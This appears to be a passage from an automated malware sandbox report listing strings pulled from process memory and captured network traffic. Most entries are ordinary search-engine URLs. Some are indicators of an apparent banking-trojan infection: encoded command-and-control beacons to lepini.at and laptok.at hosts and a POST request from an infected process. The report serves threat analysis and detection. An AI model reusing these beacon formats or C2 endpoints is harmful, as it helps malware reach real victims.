Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa62b8c8d,0x01d700d8</date><accdate>0xa62b8c8d,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.4.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.4.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: unknown

HTTP traffic detected: POST /api1/RIcDr3iQ_2F5HIV/n8436tIkJR8PrSjzuD/qVR2EWMqX/JHao30Cb5Ma6tPeJDvP0/Qpt0UP3yCDsC9Fp5cQv/WC3luav8wdMdeqfAWIs0lT/3HapmLJEH6Sr8/S94_2BZ_/2FhcJtKqyYatNIzqU2kqw4R/i383XEDNfh/7iCEha60plcDi0Gsi/YkbbHV8lpXBQ/om0NF0vi0Aw/RyBEHsBgFlPiJM/CB37HmU2lDcIAsK_2BgfJ/DHyfteBHJ3c0Jp8g/vCwxsQxKg_2FRoX/tZDGwkMH_2FCJ5tFJ3/Imp5riyeK/ktUBEA1N01Clwu/a3KCmmi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 12 Feb 2021 00:48:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: explorer.exe, 00000017.00000000.851216190.0000000006AD0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: {F336FBA0-6CCB-11EB-90EB-ECF4BBEA1588}.dat.3.dr, ~DF2FA3F8BD15FCAE55.TMP.3.dr	String found in binary or memory: http://api10.laptok.at/api1/JQsoHKJSB/rNdVJ_2ByIK2QDFJR2qj/j2rw6DMd2f1e8eX8Ymg/9u0LouY1o0qnmocJ9nvfx
Source: explorer.exe, 00000017.00000000.856992999.000000000A9D2000.00000004.00000001.sdmp, explorer.exe, 00000017.00000000.856586501.000000000A897000.00000004.00000001.sdmp, ~DF3B3D5A4FBE860D30.TMP.3.dr, {F336FB9E-6CCB-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: http://api10.laptok.at/api1/lgORGW5qFn_2FL/FlQCK9WAHI3Hiwfkv_2Bd/YD_2BI2Xw2AGWng8/expfsroDYWZ8_2B/ZG
Source: {F336FBA2-6CCB-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: http://api10.laptok.at/api1/wPzY3TDew43rXgQ6h/jEuIuoewqqB_/2F8ty3dLaY0/g90J7yjpK4odzi/vJi7IcKUU7_2Fx
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000017.00000000.851216190.0000000006AD0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000017.00000000.860723524.0000000011ADC000.00000004.00000001.sdmp	String found in binary or memory: http://c56.lepini.at/jvasse
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: regsvr32.exe, powershell.exe, 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, explorer.exe, 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, control.exe, 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, rundll32.exe, 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp, powershell.exe, 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, explorer.exe, 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, control.exe, 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, rundll32.exe, 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000010.00000003.1052476041.000001895DA8A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsoft
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: regsvr32.exe, 00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, powershell.exe, 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, explorer.exe, 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, control.exe, 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, rundll32.exe, 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: auction[1].htm.4.dr	String found in binary or memory: http://popup.taboola.com/german
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
